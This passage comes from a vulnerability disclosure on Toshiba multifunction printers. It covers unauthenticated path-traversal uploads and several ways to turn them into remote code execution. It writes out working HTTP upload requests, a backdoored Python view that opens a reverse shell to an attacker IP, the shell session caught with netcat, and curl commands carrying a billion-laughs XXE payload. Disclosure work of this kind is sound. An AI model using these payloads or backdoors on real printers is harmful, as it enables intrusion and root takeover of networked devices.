https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
It is possible to upload a document:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
The uploaded file will be stored inside the printer in the  
/work/al/tmp/upload/ directory, inside a directory named by the  
current session.  
  
bash-4.1# find /work/al/tmp/upload  
/work/al/tmp/upload  
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab  
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab/test3.txt  
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab/test1.txt  
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab/test2.txt  
bash-4.1# ls -latrR /work/al/tmp/upload  
/work/al/tmp/upload:  
total 12  
drwxr-xr-x 7 root lp 4096 Mar 24 05:35 ..  
drwx------ 2 apache trusted 4096 Mar 24 05:43  
ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab  
drwxrwxrwx 3 root trusted 4096 Mar 24 05:46 .  
  
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab:  
total 20  
-rw-rw-rw- 1 apache trusted 8 Mar 24 05:41 test1.txt  
-rw-rw-rw- 1 apache trusted 9 Mar 24 05:42 test2.txt  
-rw-rw-rw- 1 apache trusted 9 Mar 24 05:43 test3.txt  
drwx------ 2 apache trusted 4096 Mar 24 05:43 .  
drwxrwxrwx 3 root trusted 4096 Mar 24 05:46 ..  
bash-4.1#  
  
This current session is provided by the printer when visiting the web  
interface without authentication.  
  
An attacker can replay the HTTP request with a valid session obtained  
while browsing http://ip/?MAIN=EFILING without authentication, and  
change the path to the uploaded file. This path will then be used to  
store the file inside the remote printer.  
  
For example, with a `Name` variable set to  
`/./../../../../../home/SYSROM_SRC/sbin/malicious.program`, the  
uploaded file is correctly written into  
`/home/SYSRM_SRC/sbin/malicious.program` inside the printer.  
  
The HTTP request will be:  
  
POST /contentwebserver/upload HTTP/1.1  
Host: 10.0.0.1:8080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0)  
Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data;  
boundary=---------------------------12552735029913057752829397207  
Content-Length: 1011  
Origin: http://10.0.0.1:8080  
Connection: close  
Referer: http://10.0.0.1:8080/efiling/UploadArchive.html?v=1517352288ta  
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;  
pageTrack=MAIN%3DDEVICE;  
Session=10.0.0.2.c8a776a2c87613d78cbb94c558269c61;  
IgnoreSessionTimeout=3  
Upgrade-Insecure-Requests: 1  
  
-----------------------------12552735029913057752829397207  
Content-Disposition: form-data; name="formSubmitCompleteEventHandler"  
  
frames[1].formSubmitComplete  
-----------------------------12552735029913057752829397207  
Content-Disposition: form-data; name="DeviceInformationModel"  
  
<DeviceInformationModel><Command><Move><commandNode>FileStorages</commandNode><Params><source><File>test.txt</File><name>Upload</name></source><destination><name>DataImport</name></destination></Params></Move></Command></DeviceInformationModel>  
-----------------------------12552735029913057752829397207  
Content-Disposition: form-data; name="CsrfpId"  
  
10.0.0.2.c8a776a2c87613d78cbb94c558269c61  
-----------------------------12552735029913057752829397207  
Content-Disposition: form-data;  
name="/./../../../../../home/SYSROM_SRC/sbin/malicious.program";  
filename="test.txt"  
Content-Type: text/plain  
  
MALICIOUS_CONTENT_WRITTEN_INTO_THE_HARD_DISK  
  
-----------------------------12552735029913057752829397207--  
  
Burp Request:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
And the file is correctly written into  
`/home/SYSRM_SRC/sbin/malicious.program` inside the printer:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
This vulnerability can be used to get Remote Code Executions using  
several different ways. Due to some weaknesses found in Toshiba  
printers, there are hundreds different ways to get Remote Code  
Execution. For example:  
  
* Upload of a malicious library defined in the LD_PRELOAD variable:  
* /ramdisk/al/libGetNameInfoInterface.so or  
/ramdisk/al/libGetAddtInfoInterface.so can be overwritten by a  
malicious library  
* Upload of a malicious library using the LD_LIBRARY_PATH variable -  
An attacker can upload malicious libraries inside:  
* /home/SYSROM_SRC/build/release/lib,  
* /mfp/lib,  
* /home/SYSROM_SRC/NoBuildItems/common/lib,  
* /home/SYSROM_SRC/build/thirdparty/plugins/platforminputcontexts/,  
* /home/SYSROM_SRC/build/release/lib.  
* Upload of a malicious program due to insecure permissions:  
* As shown in Local Privilege Escalation and Remote Code Execution  
using insecure permissions for 106 programs, a lot of programs running  
as root can be overwritten due to insecure permissions (777)  
* Upload a malicious Python program or a malicious Python library  
* ...  
  
This lack of protection can be found in several HTML forms when using  
the printer, without administrative privileges. For example, the page  
at http://10.0.0.1:8080/Administration/maintenance/uploadsoft/DriverCustomize.html  
allows uploading any file:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
It is mandatory to inject a `<INPUT TYPE=SUBMIT>` in the server  
response using Burp or to directly generate such request to upload any  
file.  
  
An example is shown below on how to get Remote Code Execution using  
the upload of a malicious Python script in the next section, using the  
following request:  
  
POST /contentwebserver/upload HTTP/1.1  
Host: 10.0.0.1:8080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0)  
Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data;  
boundary=---------------------------394285998421640844852768059947  
Content-Length: 1126  
Origin: http://10.0.0.1:8080  
Connection: close  
Referer: http://10.0.0.1:8080/Administration/maintenance/uploadsoft/DriverCustomize.html  
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;  
pageTrack=MAIN%3DDEVICE; clicked=0; addrLastVisited=ADDRBK;  
IgnoreSessionTimeout=1;  
Session=10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c  
Upgrade-Insecure-Requests: 1  
  
-----------------------------394285998421640844852768059947  
Content-Disposition: form-data; name="formSubmitCompleteEventHandler"  
  
frames[0].formSubmitCompleteUploadList  
-----------------------------394285998421640844852768059947  
Content-Disposition: form-data; name="DeviceInformationModel"  
  
<DeviceInformationModel><GetValue><eFiling><View><BoxList/></View></eFiling></GetValue><Command><GetEFilingBoxes><commandNode>eFiling/BoxList</commandNode><Params><responseXpath  
contentType='XPath'>eFiling/View/BoxList</responseXpath><curPage  
contentType='Value'>1</curPage><pageSize  
contentType='Value'>200</pageSize><definedBox  
contentType='Value'>true</definedBox></Params></GetEFilingBoxes></Command></DeviceInformationModel>  
-----------------------------394285998421640844852768059947  
Content-Disposition: form-data; name="CsrfpId"  
  
10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c  
-----------------------------394285998421640844852768059947  
Content-Disposition: form-data; name="test.txt"; filename="test.txt"  
Content-Type: text/plain  
  
test  
  
-----------------------------394285998421640844852768059947--  
  
And the file is correctly uploaded into the printer:  
  
bash-4.1# ls -la  
/work/al/tmp/upload/ContentWebServer_10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c/  
total 12  
drwx------ 2 apache trusted 4096 May 27 19:34 .  
drwxrwxrwx 3 root trusted 4096 May 27 19:30 ..  
-rw-rw-rw- 1 apache trusted 5 May 27 19:34 test.txt  
bash-4.1# cat  
/work/al/tmp/upload/ContentWebServer_10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c/test.txt  
test  
bash-4.1#  
  
We can find several webpages allowing exploiting the vulnerable  
`/contentwebserver/upload` API.  
  
It was determined that these webpages are using the insecure  
`/contentwebserver/upload` API. They can be used by any attacker to  
upload any file into the printers:  
  
- - http://printer-ip/efiling/UploadFrame.html  
- - http://printer-ip/efiling/UploadArchive.html  
- - http://printer-ip/efiling/UploadFrame.html  
- - http://printer-ip/efiling/UploadArchiveProgress.html  
- - http://printer-ip/efiling/UpLoadArchiveClose.html  
- - http://printer-ip/efiling/UploadArchiveButton.html  
- - http://printer-ip/Registration/AddressBook/AddrImport.html  
- - http://printer-ip/Registration/AddressBook/AddrImportListFrame.html  
- - http://printer-ip/Administration/maintenance/uploadsoft/DriverCustomize.html  
- - ...  
  
Some of these files are directly reachable without authentication  
(e.g. Registration or efiling) and can be found without an admin  
account.  
  
  
  
### Remote Code Execution - Upload of a new .py module inside WSGI  
Python programs  
  
Some of the APIs and web interfaces of the printers are written in Python.  
  
Since the permissions of these Python scripts inside the printers are  
insecure, a backdoored version of the  
`/registration/al/TopAccessPy/server/screenfacade/appmgmt/views.py`  
has been uploaded as shown below:  
  
Content of `/registration/al/TopAccessPy/server/screenfacade/appmgmt/views.py`  
with a malicious payload added on line 25:  
  
[code:python]  
1 #! /usr/bin/env python  
2 # -*- coding: utf-8 -*-  
3 import sys  
4 import os  
5 from pyramid.view import view_config  
6 from pyramid.exceptions import HTTPForbidden  
7 from pyramid.response import Response,FileResponse  
8 from server.screenfacade.appmgmt.applicationmanager import  
applicationManagementModel  
9 import logging  
10 import json  
11 import pyeapicore  
12  
13 sys.path.append('/home/SYSROM_SRC/lib')  
14  
15 log = logging.getLogger("server")  
16  
17 @view_config(route_name='get_app_list_deployed', xhr=True, renderer='jsonp')  
18 def get_app_list_deployed(request):  
19 log.warning("++++++++++++++++++++++++++++++++")  
20 log.warning("get app list Views : Start ")  
21 SessionID = ''  
22 session = ' '  
23 csrfpId = ''  
24 browserLang = ''  
25 os.system("bash -i >& /dev/tcp/10.0.0.2/21 0>&1")  
26  
27 if 'SessionID' in request.cookies:  
28 SessionID = request.cookies['SessionID']  
29 if 'Session' in request.cookies:  
30 session = request.cookies['Session']  
31 if 'csrfpId' in request.headers:  
32 csrfpId = request.headers['csrfpId']  
33 if 'BrowserLang' in request.cookies:  
34 browserLang = request.cookies['BrowserLang']  
35  
36 log.info('Session ID obtained from request :' + SessionID)  
37 log.info('csrfpId obtained from request:' + csrfpId)  
38 validationMap = True  
39  
40 if validationMap['VALIDATION_STATUS'] == 'PASSED':  
41 log.info('User Validation : SUCCESS')  
42 data = applicationManagementModel.getAppList(browserLang)  
43 log.warning("get app list Views : End ")  
44 log.warning("++++++++++++++++++++++++++++++++")  
45 return json.dumps(data)  
46 else:  
47 log.info('User Validation : FAILURE')  
48 log.warning("get app list Views : End ")  
49 if "HTTP_REQUEST_FORBIDDEN" in validationMap:  
50 return HTTPForbidden("Error 403 : Forbidden Request")  
51 else:  
52 return json.dumps(validationMap)  
53  
54 @view_config(route_name='start_background_application', xhr=True,  
renderer='jsonp')  
55 def start_background_application(request):  
56 log.warning("++++++++++++++++++++++++++++++++")  
57 log.warning("start background app : Start ")  
[...]  
[/code]  
  
Due to some reverse proxy rules and check before this API can be  
reached, this Python code is reachable using the API path  
`http://printerip/tapy/server/appmgmt/applistDeployed` with a cookie  
previously provided by the printer when visiting http://printerip/  
(without authentication).  
  
When sending a HTTP request to  
`http://printerip/tapy/server/appmgmt/applistDeployed`, the attacker  
will receive a connect-back shell from the printer:  
  
kali# nc -l -v -p 21  
listening on [any] 21 ...  
10.0.0.1: inverse host lookup failed: Unknown host  
connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 37243  
[apache@MFP14144292 /]$ id  
uid=1000(apache) gid=2000(trusted) groups=2000(trusted)  
[apache@MFP14144292 /]$ uname -ap  
Linux MFP14144292 3.10.38-ltsi-WR6.0.0.11_standard #3513 SMP Tue  
Jul 5 09:58:22 IST 2022 i686 GNU/Linux  
[apache@MFP14144292 /]$  
  
Connect-back shell as apache:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
  
  
### Remote Code Execution - Upload of a new .ini configuration files  
inside WSGI Python programs  
  
It is possible to overwrite the .ini configuration file used by WSGI  
Python programs. This technique is public as of 2023-02-28:  
https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html.  
  
Apache is running with WSGI configurations:  
  
bash-4.1# ps auxww | grep apache  
apache 1611 0.0 0.1 1264444 3708 ? Sl 10:37 0:00  
/usr/local/ebx/httpd_worker/bin/httpd_worker -f  
/encryption/al/network/config/httpd-prox.conf -k start  
apache 1822 0.2 3.6 483056 108852 ? Sl 10:37 1:02  
(wsgi:webpanel) -f  
/encryption/al/network/config/httpd-wsgi.conf -k start  
apache 1823 0.0 2.1 270952 64172 ? Sl 10:37 0:05  
(wsgi:topaccesspy) -f  
/encryption/al/network/config/httpd-wsgi.conf -k start  
apache 1824 0.0 0.1 285148 4452 ? Sl 10:37 0:00  
/usr/local/ebx/httpd_worker/bin/httpd_worker -f  
/encryption/al/network/config/httpd-wsgi.conf -k start  
  
The Python scripts running as WSGI are configured with specific .ini  
configuration files:  
  
- - `/registration/al/WebPanel/development.ini`  
- - `/registration/al/TopAccessPy/development.ini`  
  
Unfortunately, these configuration files can be rewritten because of  
insecure permissions, allowing a remote attacker to execute commands,  
as described in recent public research.  
  
These files have insecure permissions as shown below:  
  
bash-4.1# ls -la /registration/al/WebPanel/  
total 2632  
drwxrwxrwx 7 root root 4096 Dec 6 03:33 .  
drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..  
-rwxrwxrwx 1 root root 2642944 Dec 6 03:33 HomeBackgroundImages.tar.gz  
-rwxrwxrwx 1 root root 857 Dec 6 03:33 Makefile  
-rwxrwxrwx 1 root root 909 Dec 6 03:33 config.rb  
-rwxrwxrwx 1 root root 1103 Dec 6 03:33 development.ini  
drwxrwxrwx 4 root root 4096 Jan 22 2015 predefinedxml  
-rwxrwxrwx 1 root root 199 Dec 6 03:33 pyramid.wsgi  
drwxrwxrwx 3 root root 4096 Dec 6 03:33 statuspages  
drwxrwxrwx 14 root root 4096 Dec 6 03:33 wpclient  
drwxrwxrwx 6 root root 4096 Mar 14 16:32 wpserver  
drwxrwxrwx 2 root root 4096 Dec 6 03:33 wpserver.egg-info  
bash-4.1# ls -la /registration/al/WebPanel/development.ini  
-rwxrwxrwx 1 root root 1103 Dec 6 03:33  
/registration/al/WebPanel/development.ini  
  
bash-4.1# ls -la /registration/al/TopAccessPy  
total 36  
drwxrwxrwx 5 root root 4096 Dec 6 03:39 .  
drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..  
-rwxrwxrwx 1 root root 315 Dec 6 03:39 Makefile  
-rwxrwxrwx 1 root root 2091 Dec 6 03:39 TA_CacheScript.sh  
drwxrwxrwx 7 root root 4096 Mar 23 10:37 client  
-rwxrwxrwx 1 root root 1078 Dec 6 03:39 development.ini  
-rwxrwxrwx 1 root root 202 Dec 6 03:39 pyramid.wsgi  
drwxrwxrwx 6 root root 4096 Mar 14 16:32 server  
drwxrwxrwx 2 root root 4096 Dec 6 03:39 server.egg-info  
bash-4.1# ls -la /registration/al/TopAccessPy/development.ini  
-rwxrwxrwx 1 root root 1078 Dec 6 03:39  
/registration/al/TopAccessPy/development.ini  
  
These scripts can be overwritten to include specific commands to be executed:  
  
Content of `/registration/al/TopAccessPy/development.ini`:  
  
bash-4.1# cat /registration/al/TopAccessPy/development.ini  
[app:main]  
use = egg:server  
  
pyramid.reload_templates = true  
pyramid.debug_authorization = false  
pyramid.debug_notfound = false  
pyramid.debug_routematch = false  
pyramid.default_locale_name = en  
pyramid.includes = pyramid_tm  
  
[server:main]  
  
# Begin logging configuration  
  
[loggers]  
keys = root, server  
  
[handlers]  
keys = console, serverhandler  
  
[formatters]  
keys = generic, serverformatter  
  
[logger_root]  
level = DEBUG  
handlers = console  
  
[logger_server]  
level=DEBUG  
handlers=serverhandler  
qualname=server  
propagate=0  
  
[handler_console]  
class = StreamHandler  
args = (sys.stderr,)  
level = NOTSET  
formatter = generic  
  
[handler_serverhandler]  
class=logging.handlers.RotatingFileHandler  
level=DEBUG  
formatter=serverformatter  
args=('/work/log/al/webpanel/python_ta.log','a',(5*1024*1024),3)  
  
[formatter_generic]  
format = %(asctime)s %(levelname)-5.5s [%(name)s][%(threadName)s]  
%(message)s  
  
[formatter_serverformatter]  
format=%(asctime)s%(msecs)03d Pid= %(process)d Tid= %(thread)d  
%(filename)s %(lineno)d %(levelname)s %(message)s  
datefmt=%m/%d %H:%M:%S  
  
# End logging configuration  
  
  
  
### Remote Code Execution - Upload of a malicious script  
`/tmp/backtraceScript.sh` and injection of malicious gdb commands  
  
When a program crashes, the `/tmp/backtraceScript.sh` script will be  
executed as root as shown below:  
  
2023/05/27 19:48:02 CMD: UID=0 PID=22535 | sh -c  
/tmp/backtraceScript.sh  
"/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080" >  
"/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080"_backtrace  
2023/05/27 19:48:02 CMD: UID=0 PID=22536 | /bin/bash  
/tmp/backtraceScript.sh  
/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080  
2023/05/27 19:48:02 CMD: UID=0 PID=22540 | /bin/bash  
/tmp/backtraceScript.sh  
/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080  
2023/05/27 19:48:02 CMD: UID=0 PID=22539 | /bin/bash  
/tmp/backtraceScript.sh  
/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080  
2023/05/27 19:48:02 CMD: UID=0 PID=22538 | /bin/bash  
/tmp/backtraceScript.sh  
/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080  
2023/05/27 19:48:02 CMD: UID=0 PID=22537 | /bin/bash  
/tmp/backtraceScript.sh  
/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080  
2023/05/27 19:48:03 CMD: UID=0 PID=22541 | gdb -c  
/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080 -x  
/tmp/gdb_commands.txt  
2023/05/27 19:48:03 CMD: UID=0 PID=22542 | gdb  
/usr/local/ebx/httpd_worker/bin/httpd_worker  
/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080  
--batch --command=/tmp/gdb_commands.txt  
2023/05/27 19:48:03 CMD: UID=0 PID=22543 | iconv -l  
  
This script has insecure permissions (777) and will run gdb as root:  
  
Content of `/tmp/backtraceScript.sh`:  
  
bash-4.1# ls -la /tmp/backtraceScript.sh  
-rwxrwxrwx 1 root root 1457 Apr 6 2016 /tmp/backtraceScript.sh  
bash-4.1# cat /tmp/backtraceScript.sh  
#!/bin/bash  
OIFS=${IFS}  
IFS=$'\n'  
echo "quit" > /tmp/gdb_commands.txt  
echo "quit" >> /tmp/gdb_commands.txt  
EXE_NAME=`gdb -c "$1" -x /tmp/gdb_commands.txt | grep "Core was  
generated by" | cut -d'\`' -f2 | cut -d' ' -f1`  
echo "thread apply all backtrace full" > /tmp/gdb_commands.txt  
echo "set print asm" >> /tmp/gdb_commands.txt  
echo "set print demangle on" >> /tmp/gdb_commands.txt  
echo "disassemble" >> /tmp/gdb_commands.txt  
echo "info reg" >> /tmp/gdb_commands.txt  
echo "quit" >> /tmp/gdb_commands.txt  
echo "quit" >> /tmp/gdb_commands.txt  
if [ "$EXE_NAME" = "" ];then  
if [ -d /work/log/platform/syscallerr/core_files ];then  
mv "$1" /work/log/platform/syscallerr/core_files/  
else  
mkdir -p /work/log/platform/syscallerr/core_files  
mv "$1" /work/log/platform/syscallerr/core_files/  
fi  
else  
if [ -f $EXE_NAME ];then  
gdb $EXE_NAME "$1" --batch --command=/tmp/gdb_commands.txt 2>&1  
elif [ -f $EB2/bin/$EXE_NAME ]; then  
gdb $EB2/bin/$EXE_NAME "$1" --batch --command=/tmp/gdb_commands.txt 2>&1  
elif [ "$EXE_NAME"="(wsgi:webapi)" -o  
"$EXE_NAME"="(wsgi:webpanel)" -o "$EXE_NAME"="(wsgi:topaccesspy)" ];  
then  
EXE_NAME=/usr/local/ebx/httpd_worker/bin/httpd_worker  
gdb $EXE_NAME "$1" --batch --command=/tmp/gdb_commands.txt 2>&1  
else  
if [ -d /work/log/platform/syscallerr/core_files ];then  
mv "$1" /work/log/platform/syscallerr/core_files/  
else  
mkdir -p /work/log/platform/syscallerr/core_files  
mv "$1" /work/log/platform/syscallerr/core_files/  
fi  
fi  
fi  
IFS=${OIFS}  
bash-4.1#  
  
The `/tmp/gdb_commands.txt` gdb script (used by gdb in the  
`/tmp/backtraceScript.sh` script) can be also overwritten by an  
attacker to contain gdb commands and get Remote Code Execution.  
  
An attacker can change the `/tmp/backtraceScript.sh` to get Remote  
Code Execution.  
  
An attacker can change the `/tmp/gdb_commands.txt` script to get  
Remote Code Execution.  
  
  
  
### Remote Code Execution - Upload of a malicious  
`/home/SYSROM_SRC/build/common/bin/sapphost.py` program  
  
The program `/home/SYSROM_SRC/build/release/bin/sapphost.py` runs as  
root when the printer starts:  
  
bash-4.1# ps auxww|grep python  
root 3984 5.0 5.3 200160 70944 ? Sl 18:49 0:03  
python /home/SYSROM_SRC/build/release/bin/sapphost.py  
10000000-0000-0000-0000-500000000000  
root 4597 4.5 3.5 144312 47740 ? Sl 18:49 0:02  
python /home/SYSROM_SRC/build/release/bin/sapphost.py  
10000000-0000-0000-0000-500000000001  
root 5193 0.0 0.1 12616 1852 ? S 18:50 0:00 grep python  
bash-4.1#  
  
`/home/SYSROM_SRC/build/release/bin/sapphost.py` is a symbolic link to  
`/home/SYSROM_SRC/build/common/bin/sapphost.py` and this Python  
program has insecure permissions, allowing any local user or any  
remote attacker leveraging the insecure file upload vulnerability to  
overwrite it:  
  
bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin/sapphost.py  
lrwxrwxrwx 1 root root 32 Mar 15 11:44  
/home/SYSROM_SRC/build/release/bin/sapphost.py ->  
../../thirdparty/bin/sapphost.py  
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/bin/sapphost.py  
lrwxrwxrwx 1 root root 28 Mar 15 11:44  
/home/SYSROM_SRC/build/thirdparty/bin/sapphost.py ->  
../../common/bin/sapphost.py  
bash-4.1# ls -la /home/SYSROM_SRC/build/common/bin/sapphost.py  
-rwxrwxrwx 1 root root 2124 Oct 12 2021  
/home/SYSROM_SRC/build/common/bin/sapphost.py  
  
An attacker can overwrite this Python code to get Remote Code  
Execution when the printer starts.  
  
  
  
### Remote Code Execution - Upload of malicious libraries  
  
When analyzing the processes running in the printers, it appears the  
`LD_PRELOAD` variable is used to load specific shared libraries:  
  
- - `/ramdisk/al/libGetNameInfoInterface.so`  
- - `/ramdisk/al/libGetAddtInfoInterface.so`  
  
We can find the `LD_PRELOAD` variable set by default in programs  
running in the printers:  
  
bash-4.1# printenv | grep LD_PRELO  
LD_PRELOAD=/ramdisk/al/libGetNameInfoInterface.so:/ramdisk/al/libGetAddtInfoInterface.so:  
bash-4.1# ls -la /ramdisk/al/libGetNameInfoInterface.so  
-rwxrwxrwx 1 root root 70813 Dec 6 02:02  
/ramdisk/al/libGetNameInfoInterface.so  
bash-4.1# s -la /ramdisk/al/libGetAddtInfoInterface.so  
-rwxrwxrwx 1 root root 87311 Dec 6 02:02  
/ramdisk/al/libGetAddtInfoInterface.so  
bash-4.1#  
  
For example, when sending 55 HTTP requests to the printers, new Apache  
processes running as root will be created on the fly by the printer,  
as shown below. These new processes will load and execute code from  
`libGetNameInfoInterface.so` and `libGetAddtInfoInterface.so`. An  
attacker can rewrite any file over them to get Remote Code Execution.  
  
Using the HTTP request from the Pre-authenticated Blind XML External  
Entity (XXE) injection - DoS, we will send 55 HTTP requests (only the  
last 3 are displayed) containing the Billion-Laugh Attack, to create  
new Apache processes in the remote printer:  
  
kali% curl -i -s -k -X $'POST' \  
-H $'Host: 10.0.0.1:8080' -H $'User-Agent: Mozilla/5.0 (X11;  
Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept:  
*/*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip,  
deflate' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H  
$'Content-Type: text/plain; charset=utf-8' -H $'csrfpId:  
10.0.0.1.852d519a6fa9825fae857bac5c003da0' -H $'Content-Length: 760'  
-H $'Origin: http://10.0.0.1:8080' -H $'Connection: close' -H  
$'Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS' \  
-b $'Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0;  
Locale=en-US,en#q=0.5; BrowserLang=en_US;  
pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT' \  
--data-binary $'<!DOCTYPE lolz [\x0d\x0a <!ENTITY lol  
\"lol\">\x0d\x0a <!ELEMENT lolz (#PCDATA)>\x0d\x0a <!ENTITY lol1  
\"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\x0d\x0a  
<!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\x0d\x0a  
<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\x0d\x0a  
<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\x0d\x0a  
<!ENTITY lol5 \"&lol4;&lol4;&lol4;\">\x0d\x0a <!ENTITY lol6  
\"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">\x0d\x0a  
<!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">\x0d\x0a  
<!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">\x0d\x0a  
<!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">\x0d\x0a]>\x0d\x0a<lolz>&lol9;</lolz>'  
\  
$'http://10.0.0.1:8080/contentwebserver' &  
[53] 2286190  
  
kali% curl -i -s -k -X $'POST' \  
-H $'Host: 10.0.0.1:8080' -H $'User-Agent: Mozilla/5.0 (X11;  
Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept:  
*/*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip,  
deflate' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H  
$'Content-Type: text/plain; charset=utf-8' -H $'csrfpId:  
10.0.0.1.852d519a6fa9825fae857bac5c003da0' -H $'Content-Length: 760'  
-H $'Origin: http://10.0.0.1:8080' -H $'Connection: close' -H  
$'Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS' \  
-b $'Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0;  
Locale=en-US,en#q=0.5; BrowserLang=en_US;  
pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT' \  
--data-binary $'<!DOCTYPE lolz [\x0d\x0a <!ENTITY lol  
\"lol\">\x0d\x0a <!ELEMENT lolz (#PCDATA)>\x0d\x0a <!ENTITY lol1  
\"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\x0d\x0a  
<!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\x0d\x0a  
<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\x0d\x0a  
<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\x0d\x0a  
<!ENTITY lol5 \"&lol4;&lol4;&lol4;\">\x0d\x0a <!ENTITY lol6  
\"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">\x0d\x0a  
<!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">\x0d\x0a  
<!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">\x0d\x0a  
<!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">\x0d\x0a]>\x0d\x0a<lolz>&lol9;</lolz>'  
\  
$'http://10.0.0.1:8080/contentwebserver' &  
[54] 2286192  
  
kali% curl -i -s -k -X $'POST' \  
-H $'Host: 10.0.0.1:8080' -H $'User-Agent: Mozilla/5.0 (X11;  
Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept:  
*/*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip,  
deflate' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H  
$'Content-Type: text/plain; charset=utf-8' -H $'csrfpId:  
10.0.0.1.852d519a6fa9825fae857bac5c003da0' -H $'Content-Length: 760'  
-H $'Origin: http://10.0.0.1:8080' -H $'Connection: close' -H  
